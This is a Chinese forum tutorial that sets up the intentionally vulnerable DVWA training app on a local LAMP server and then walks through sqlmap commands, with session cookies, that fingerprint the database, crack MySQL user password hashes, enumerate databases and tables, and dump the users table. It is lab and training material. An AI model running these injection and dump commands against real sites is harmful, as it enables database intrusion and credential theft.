设为首页 收藏本站
查看: 679|回复: 0

[经验分享] DVWA+SQLmap+Mysql注入实战

[复制链接]
发表于 2018-10-1 07:02:54 | 显示全部楼层 |阅读模式
  一、部署***测试演练系统DVWA
  1. 下载DVWA软件包
  官方下载地址:http://www.dvwa.co.uk/,当前最新版本为:DVWA-1.9
  wget https://codeload.github.com/ethicalhack3r/DVWA/zip/master
  2. 部署linux环境
  yum install -y httpd mysql mysql-server php php-mysql php-gd
  3. 开启httpd和mysqld服务
  service httpd start
  service mysqld start
  4. 测试htttp对php的解析,浏览器访问http://ip/test.php正常
  vim /var/www/html/test.php
  写入:
  
  5. 修改mysql的密码
  mysqladmin -uroot password "123456"
  6. 将DVWA-1.9.zip解压至/var/www/html,并修改属主为apache
  unzip DVWA-1.9.zip -d /var/www/html
  chown -R apache:apache /var/www/html/DVWA-1.9
  7. 修改DVWA配置文件数据库密码为123456
  vim /var/www/html/DVWA-1.9/config/config.inc.php
  修改密码:
  $_DVWA[ 'db_password' ] = '123456';
DSC0000.png

  8. 进入DVWA的web安装界面,http://ip/DVWA-1.9/setup.php,发现报错
DSC0001.png

  解决方法:
  1)编辑php的配置文件 vim /etc/php.ini
  allow_url_include = On
DSC0002.png

  2)编辑DVWA配置文件 vim /var/www/html/DVWA-1.9/config/config.inc.php
  找到创建公钥和私钥的链接:https://www.google.com/recaptcha/admin/create申请后填写在配置文件中:
  公钥:6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb
  私钥:6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k
DSC0003.png

DSC0004.png

DSC0005.png

  9. 重启http,使修改的配置文件生效,刷新web界面,错误消除
  service httpd restart
DSC0006.png

  10. 点击Create/Reset Database,自动跳转到登录界面,默认用户名/密码:admin/password
  至此,DVWA已部署完成
DSC0007.png

  二、安装SQLmap漏洞查看工具
  1. 官方下载:http://sqlmap.org/http://sqlmap.org/
  版本:sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz
  2.  解压sqlmap,并执行
  说明:该工具是用python写的,需安装python,它不是编译型语言,而是执行性语言,直接运行
DSC0008.png

  命令 tar -zxvf  sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz
  命令 ./sqlmap.py
DSC0009.png

  3. 设置命令别名,修改vim /etc/profile,直接使用sqlmap命令
  命令 alias sqlmap='python /usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'
  命令 source /etc/profile
DSC00010.png

  三、实战
  实战1:枚举登录MYSQL数据的用户名与密码
  实战2:枚举所有数据库
  实战3:枚举指定数据库的数据表
  实战4:获取指定数据库和表中所有列的信息
  实战5:枚举指定数据表中的所有用户名与密码
  环境准备:
  1)登录http://192.168.1.124/DVWA-1.9,将安全级别设置为最低;
  2)开启Firefox浏览器TamperData插件,等待获取cookies值;

  3)在【SQL Injection】项中,提交User>  获得注入点:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#
  4)TamperData弹窗获取cookies值:security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552
DSC00011.png

DSC00012.png

  实战1:枚举登录MYSQL数据的用户名与密码
  sqlmap语法参数:

  •   -u :指定目标URL,即注入点
  •   --cookies:当前会话的cookies值
  •   -b:获取数据库类型,检索数据库管理系统标识
  •   --current-db:获取当前数据库
  •   --current-user:获取当前登录数据库使用的用户
  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' -b  --current-db  --current-user
  说明:根据提示回复Y,继续
DSC00013.png

  结果:得到当前数据库为dawa,使用的用户为root@localhost
DSC00014.png

  实战2:枚举所有数据库
  sqlmap语法参数:

  •   --users:枚举数据库用户名
  •   -password:枚举数据库用户的密码(hash)
  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --users --password
DSC00015.png

  说明:选择目录下字典文件,暴力破解
DSC00016.png

  结果:数据库用户名为root,密码也有明文形式123456
DSC00017.png

  实战3:枚举数据库和指定数据库的数据表
  sqlmap语法参数:

  •   --dbs:枚举当前数据库
  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --dbs
  结果:mysql下所有的数据库
DSC00018.png

  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa --tables
  结果:dvwa库中,所有的表
DSC00019.png

  实战4:获取指定数据库和表中所有列的信息
  sqlmap语法参数:

  •   -D:指定的数据库
  •   -T:指定数据库中的数据表
  •   --columns:获取列的信息
  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users --columns
  结果:dvwa库,users表中所有字段信息
DSC00020.png

  实战5:枚举指定数据表中的所有用户名与密码
  sqlmap语法参数:

  •   -C:枚举数据表中的列
  •   --dump:存储数据表项
  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump
  结果:dvwa库,users表中user字段和password字段信息,最后表中信息转存文件中
DSC00021.png



运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-606875-1-1.html 上篇帖子: AWS RDS for MySQL 基本维护 下篇帖子: Mysql---安装测试数据库employees
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表